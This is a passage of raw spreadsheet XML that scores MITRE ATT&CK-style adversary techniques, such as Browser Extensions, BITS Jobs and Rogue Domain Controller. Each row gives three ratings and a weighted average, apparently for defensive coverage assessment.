      <c r="C172" s="45" t="s">
        <v>2233</v>
      </c>
      <c r="D172" s="14">
        <v>2</v>
      </c>
      <c r="E172" s="14">
        <v>3</v>
      </c>
      <c r="F172" s="14">
        <v>4</v>
      </c>
      <c r="G172" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="43" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="41" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C173" s="45" t="s">
        <v>1199</v>
      </c>
      <c r="D173" s="14">
        <v>1</v>
      </c>
      <c r="E173" s="14">
        <v>3</v>
      </c>
      <c r="F173" s="14">
        <v>4</v>
      </c>
      <c r="G173" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="43" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="41" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C174" s="45" t="s">
        <v>3076</v>
      </c>
      <c r="D174" s="14">
        <v>2</v>
      </c>
      <c r="E174" s="14">
        <v>4</v>
      </c>
      <c r="F174" s="14">
        <v>5</v>
      </c>
      <c r="G174" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="43" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="41" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C175" s="45" t="s">
        <v>3077</v>
      </c>
      <c r="D175" s="14">
        <v>1</v>
      </c>
      <c r="E175" s="14">
        <v>3</v>
      </c>
      <c r="F175" s="14">
        <v>4</v>
      </c>
      <c r="G175" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="43" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="41" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:B)</f>
        <v>Component Object Model and Distributed COM</v>
      </c>
      <c r="C176" s="45" t="s">
        <v>1470</v>
      </c>
      <c r="D176" s="14">
        <v>3</v>
      </c>
      <c r="E176" s="14">
        <v>4</v>
      </c>
      <c r="F176" s="14">
        <v>5</v>
      </c>
      <c r="G176" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="43" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="41" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C177" s="45" t="s">
        <v>3078</v>
      </c>
      <c r="D177" s="14">
        <v>2</v>
      </c>
      <c r="E177" s="14">
        <v>3</v>
      </c>
      <c r="F177" s="14">
        <v>5</v>
      </c>
      <c r="G177" s="32">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="43" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="41" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C178" s="45" t="s">
        <v>3079</v>
      </c>
      <c r="D178" s="14">
        <v>3</v>
      </c>
      <c r="E178" s="14">
        <v>4</v>
      </c>
      <c r="F178" s="14">
        <v>5</v>
      </c>
      <c r="G178" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="43" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="41" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C179" s="45" t="s">
        <v>3080</v>
      </c>
      <c r="D179" s="14">
        <v>2</v>
      </c>
      <c r="E179" s="14">
        <v>3</v>
      </c>
      <c r="F179" s="14">
        <v>5</v>
      </c>
      <c r="G179" s="32">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="43" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="41" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C180" s="45" t="s">
        <v>3081</v>
      </c>
      <c r="D180" s="14">
        <v>1</v>
      </c>
      <c r="E180" s="14">
        <v>3</v>
      </c>
      <c r="F180" s="14">
        <v>4</v>
      </c>
      <c r="G180" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="43" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="41" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C181" s="45" t="s">
        <v>3068</v>
      </c>
      <c r="D181" s="14">
        <v>2</v>
      </c>
      <c r="E181" s="14">
        <v>4</v>
      </c>
      <c r="F181" s="14">
        <v>5</v>
      </c>
      <c r="G181" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="43" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="41" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C182" s="45" t="s">
        <v>3060</v>
      </c>
      <c r="D182" s="14">
        <v>0</v>
      </c>
      <c r="E182" s="14">
        <v>3</v>
      </c>
      <c r="F182" s="14">
        <v>4</v>
      </c>
      <c r="G182" s="32">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="43" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="41" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C183" s="45" t="s">
        <v>3058</v>
      </c>
      <c r="D183" s="14">
        <v>2</v>
      </c>
      <c r="E183" s="14">
        <v>3</v>
      </c>
      <c r="F183" s="14">
        <v>4</v>
      </c>
      <c r="G183" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="43" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="41" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C184" s="45" t="s">
        <v>3082</v>
      </c>
      <c r="D184" s="14">
        <v>1</v>
      </c>
      <c r="E184" s="14">
        <v>3</v>
      </c>
      <c r="F184" s="14">
        <v>4</v>
      </c>
      <c r="G184" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="43" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="41" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C185" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D185" s="14">
        <v>2</v>
      </c>
      <c r="E185" s="14">
        <v>4</v>
      </c>
      <c r="F185" s="14">
        <v>5</v>
      </c>
      <c r="G185" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="43" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="41" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C186" s="45" t="s">
        <v>1479</v>
      </c>
      <c r="D186" s="14">
        <v>2</v>
      </c>
      <c r="E186" s="14">
        <v>3</v>
      </c>
      <c r="F186" s="14">
        <v>4</v>
      </c>
      <c r="G186" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="43" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="41" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C187" s="45" t="s">
        <v>3060</v>
      </c>
      <c r="D187" s="14">
        <v>2</v>
      </c>
      <c r="E187" s="14">
        <v>4</v>
      </c>
      <c r="F187" s="14">
        <v>5</v>
      </c>
      <c r="G187" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="43" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="41" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C188" s="45" t="s">
        <v>1483</v>
      </c>
      <c r="D188" s="14">
        <v>2</v>
      </c>
      <c r="E188" s="14">
        <v>3</v>
      </c>
      <c r="F188" s="14">
        <v>4</v>
      </c>
      <c r="G188" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="43" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="41" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C189" s="45" t="s">
        <v>3083</v>
      </c>
      <c r="D189" s="14">
        <v>1</v>
      </c>
      <c r="E189" s="14">
        <v>3</v>
      </c>
      <c r="F189" s="14">
        <v>4</v>
      </c>
      <c r="G189" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="43" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="41" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:B)</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="C190" s="45" t="s">
        <v>1487</v>
      </c>
      <c r="D190" s="14">
        <v>2</v>
      </c>
      <c r="E190" s="14">
        <v>3</v>
      </c>
      <c r="F190" s="14">
        <v>4</v>
      </c>
      <c r="G190" s="32">
        <f t="shared" si="2"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="43" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="41" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C191" s="45" t="s">
        <v>1493</v>
      </c>
      <c r="D191" s="14">
        <v>1</v>
      </c>
      <c r="E191" s="14">
        <v>3</v>
      </c>
      <c r="F191" s="14">
        <v>4</v>
      </c>
      <c r="G191" s="32">
        <f t="shared" si="2"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="43" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="41" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C192" s="45" t="s">
        <v>3084</v>
      </c>
      <c r="D192" s="14">
        <v>3</v>
      </c>
      <c r="E192" s="14">
        <v>4</v>
      </c>
      <c r="F192" s="14">
        <v>5</v>
      </c>
      <c r="G192" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="43" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="41" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C193" s="45" t="s">
        <v>2432</v>
      </c>
      <c r="D193" s="14">
        <v>2</v>
      </c>
      <c r="E193" s="14">
        <v>4</v>
      </c>
      <c r="F193" s="14">
        <v>5</v>
      </c>
      <c r="G193" s="32">
        <f t="shared" si="2"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="43" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="41" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C194" s="45" t="s">
        <v>2427</v>
      </c>
      <c r="D194" s="14">
        <v>3</v>
      </c>
      <c r="E194" s="14">
        <v>4</v>
      </c>
      <c r="F194" s="14">
        <v>5</v>
      </c>
      <c r="G194" s="32">
        <f t="shared" si="2"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="43" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="41" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C195" s="45" t="s">
        <v>2437</v>
      </c>
      <c r="D195" s="14">
        <v>1</v>
      </c>
      <c r="E195" s="14">
        <v>3</v>
      </c>
      <c r="F195" s="14">
        <v>4</v>
      </c>
      <c r="G195" s="32">
        <f t="shared" ref="G195:G258" si="3">((D195*2)+(E195*2)+F195)/5</f>
        <v>2.4</v>
      </c>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="43" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="41" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:B)</f>
        <v>Supply Chain Compromise</v>
      </c>
      <c r="C196" s="45" t="s">
        <v>1498</v>
      </c>
      <c r="D196" s="14">
        <v>1</v>
      </c>
      <c r="E196" s="14">
        <v>2</v>
      </c>
      <c r="F196" s="14">
        <v>4</v>
      </c>
      <c r="G196" s="32">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="43" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="41" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:B)</f>
        <v>Compromise Hardware Supply Chain</v>
      </c>
      <c r="C197" s="45" t="s">
        <v>3085</v>
      </c>
      <c r="D197" s="14">
        <v>2</v>
      </c>
      <c r="E197" s="14">
        <v>4</v>
      </c>
      <c r="F197" s="14">
        <v>5</v>
      </c>
      <c r="G197" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="43" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="41" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C198" s="45" t="s">
        <v>3086</v>
      </c>
      <c r="D198" s="14">
        <v>3</v>
      </c>
      <c r="E198" s="14">
        <v>4</v>
      </c>
      <c r="F198" s="14">
        <v>5</v>
      </c>
      <c r="G198" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="43" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="41" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C199" s="45" t="s">
        <v>3087</v>
      </c>
      <c r="D199" s="14">
        <v>2</v>
      </c>
      <c r="E199" s="14">
        <v>3</v>
      </c>
      <c r="F199" s="14">
        <v>4</v>
      </c>
      <c r="G199" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="43" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="41" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:B)</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="C200" s="45" t="s">
        <v>1520</v>
      </c>
      <c r="D200" s="14">
        <v>2</v>
      </c>
      <c r="E200" s="14">
        <v>3</v>
      </c>
      <c r="F200" s="14">
        <v>4</v>
      </c>
      <c r="G200" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="43" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="41" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:B)</f>
        <v>Hardware Additions</v>
      </c>
      <c r="C201" s="45" t="s">
        <v>1525</v>
      </c>
      <c r="D201" s="14">
        <v>1</v>
      </c>
      <c r="E201" s="14">
        <v>3</v>
      </c>
      <c r="F201" s="14">
        <v>4</v>
      </c>
      <c r="G201" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="43" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="41" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:B)</f>
        <v>Password Policy Discovery</v>
      </c>
      <c r="C202" s="45" t="s">
        <v>865</v>
      </c>
      <c r="D202" s="14">
        <v>3</v>
      </c>
      <c r="E202" s="14">
        <v>4</v>
      </c>
      <c r="F202" s="14">
        <v>5</v>
      </c>
      <c r="G202" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="43" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="41" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:B)</f>
        <v>Indirect Command Execution</v>
      </c>
      <c r="C203" s="45" t="s">
        <v>859</v>
      </c>
      <c r="D203" s="14">
        <v>2</v>
      </c>
      <c r="E203" s="14">
        <v>4</v>
      </c>
      <c r="F203" s="14">
        <v>5</v>
      </c>
      <c r="G203" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="43" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="41" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="C204" s="45" t="s">
        <v>1536</v>
      </c>
      <c r="D204" s="14">
        <v>2</v>
      </c>
      <c r="E204" s="14">
        <v>3</v>
      </c>
      <c r="F204" s="14">
        <v>4</v>
      </c>
      <c r="G204" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="43" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="41" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:B)</f>
        <v>User Execution</v>
      </c>
      <c r="C205" s="45" t="s">
        <v>1540</v>
      </c>
      <c r="D205" s="14">
        <v>3</v>
      </c>
      <c r="E205" s="14">
        <v>4</v>
      </c>
      <c r="F205" s="14">
        <v>5</v>
      </c>
      <c r="G205" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="43" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="41" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:B)</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="C206" s="45" t="s">
        <v>1553</v>
      </c>
      <c r="D206" s="14">
        <v>1</v>
      </c>
      <c r="E206" s="14">
        <v>3</v>
      </c>
      <c r="F206" s="14">
        <v>4</v>
      </c>
      <c r="G206" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="43" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="41" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:B)</f>
        <v>Port Knocking</v>
      </c>
      <c r="C207" s="45" t="s">
        <v>2085</v>
      </c>
      <c r="D207" s="14">
        <v>2</v>
      </c>
      <c r="E207" s="14">
        <v>4</v>
      </c>
      <c r="F207" s="14">
        <v>5</v>
      </c>
      <c r="G207" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="43" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="41" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C208" s="45" t="s">
        <v>1563</v>
      </c>
      <c r="D208" s="14">
        <v>4</v>
      </c>
      <c r="E208" s="14">
        <v>5</v>
      </c>
      <c r="F208" s="14">
        <v>5</v>
      </c>
      <c r="G208" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="43" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="41" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C209" s="45" t="s">
        <v>584</v>
      </c>
      <c r="D209" s="14">
        <v>4</v>
      </c>
      <c r="E209" s="14">
        <v>5</v>
      </c>
      <c r="F209" s="14">
        <v>5</v>
      </c>
      <c r="G209" s="32">
        <f t="shared" si="3"/>
        <v>4.5999999999999996</v>
      </c>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="43" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="41" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C210" s="45" t="s">
        <v>2024</v>
      </c>
      <c r="D210" s="14">
        <v>3</v>
      </c>
      <c r="E210" s="14">
        <v>4</v>
      </c>
      <c r="F210" s="14">
        <v>5</v>
      </c>
      <c r="G210" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="43" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="41" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:B)</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="C211" s="45" t="s">
        <v>1567</v>
      </c>
      <c r="D211" s="14">
        <v>1</v>
      </c>
      <c r="E211" s="14">
        <v>3</v>
      </c>
      <c r="F211" s="14">
        <v>4</v>
      </c>
      <c r="G211" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="43" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="41" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Defense Evasion</v>
      </c>
      <c r="C212" s="45" t="s">
        <v>1567</v>
      </c>
      <c r="D212" s="14">
        <v>1</v>
      </c>
      <c r="E212" s="14">
        <v>3</v>
      </c>
      <c r="F212" s="14">
        <v>4</v>
      </c>
      <c r="G212" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="43" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="41" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Credential Access</v>
      </c>
      <c r="C213" s="45" t="s">
        <v>1575</v>
      </c>
      <c r="D213" s="14">
        <v>1</v>
      </c>
      <c r="E213" s="14">
        <v>3</v>
      </c>
      <c r="F213" s="14">
        <v>4</v>
      </c>
      <c r="G213" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="43" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="41" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:B)</f>
        <v>Data from Information Repositories</v>
      </c>
      <c r="C214" s="45" t="s">
        <v>3088</v>
      </c>
      <c r="D214" s="14">
        <v>2</v>
      </c>
      <c r="E214" s="14">
        <v>3</v>
      </c>
      <c r="F214" s="14">
        <v>4</v>
      </c>
      <c r="G214" s="32">
        <f t="shared" si="3"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="43" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="41" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C215" s="45" t="s">
        <v>2079</v>
      </c>
      <c r="D215" s="14">
        <v>2</v>
      </c>
      <c r="E215" s="14">
        <v>4</v>
      </c>
      <c r="F215" s="14">
        <v>5</v>
      </c>
      <c r="G215" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="43" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="41" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C216" s="45" t="s">
        <v>3089</v>
      </c>
      <c r="D216" s="14">
        <v>1</v>
      </c>
      <c r="E216" s="14">
        <v>3</v>
      </c>
      <c r="F216" s="14">
        <v>4</v>
      </c>
      <c r="G216" s="32">
        <f t="shared" si="3"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="43" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="41" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:B)</f>
        <v>Signed Script Proxy Execution</v>
      </c>
      <c r="C217" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D217" s="14">
        <v>3</v>
      </c>
      <c r="E217" s="14">
        <v>4</v>
      </c>
      <c r="F217" s="14">
        <v>5</v>
      </c>
      <c r="G217" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="43" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="41" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:B)</f>
        <v>Browser Bookmark Discovery</v>
      </c>
      <c r="C218" s="45" t="s">
        <v>1602</v>
      </c>
      <c r="D218" s="14">
        <v>2</v>
      </c>
      <c r="E218" s="14">
        <v>3</v>
      </c>
      <c r="F218" s="14">
        <v>5</v>
      </c>
      <c r="G218" s="32">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="43" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="41" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:B)</f>
        <v>Signed Binary Proxy Execution</v>
      </c>
      <c r="C219" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D219" s="14">
        <v>3</v>
      </c>
      <c r="E219" s="14">
        <v>4</v>
      </c>
      <c r="F219" s="14">
        <v>5</v>
      </c>
      <c r="G219" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="43" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="41" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:B)</f>
        <v>Remote Access Software</v>
      </c>
      <c r="C220" s="45" t="s">
        <v>1665</v>
      </c>
      <c r="D220" s="14">
        <v>2</v>
      </c>
      <c r="E220" s="14">
        <v>4</v>
      </c>
      <c r="F220" s="14">
        <v>4</v>
      </c>
      <c r="G220" s="32">
        <f t="shared" si="3"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="43" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="41" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:B)</f>
        <v>XSL Script Processing</v>
      </c>
      <c r="C221" s="45" t="s">
        <v>1669</v>
      </c>
      <c r="D221" s="14">
        <v>3</v>
      </c>
      <c r="E221" s="14">
        <v>4</v>
      </c>
      <c r="F221" s="14">
        <v>5</v>
      </c>
      <c r="G221" s="32">
        <f t="shared" si="3"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="43" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="41" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:B)</f>
        <v>Template Injection</v>
      </c>
      <c r="C222" s="45" t="s">
        <v>1673</v>
      </c>
      <c r="D222" s="14">
        <v>2</v>
      </c>
      <c r="E222" s="14">
        <v>4</v>
      </c>
      <c r="F222" s="14">
        <v>5</v>
      </c>
      <c r="G222" s="32">
        <f t="shared" si="3"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="43" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="41" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:B)</f>
        <v>File and Directory Permissions Modification</v>
      </c>
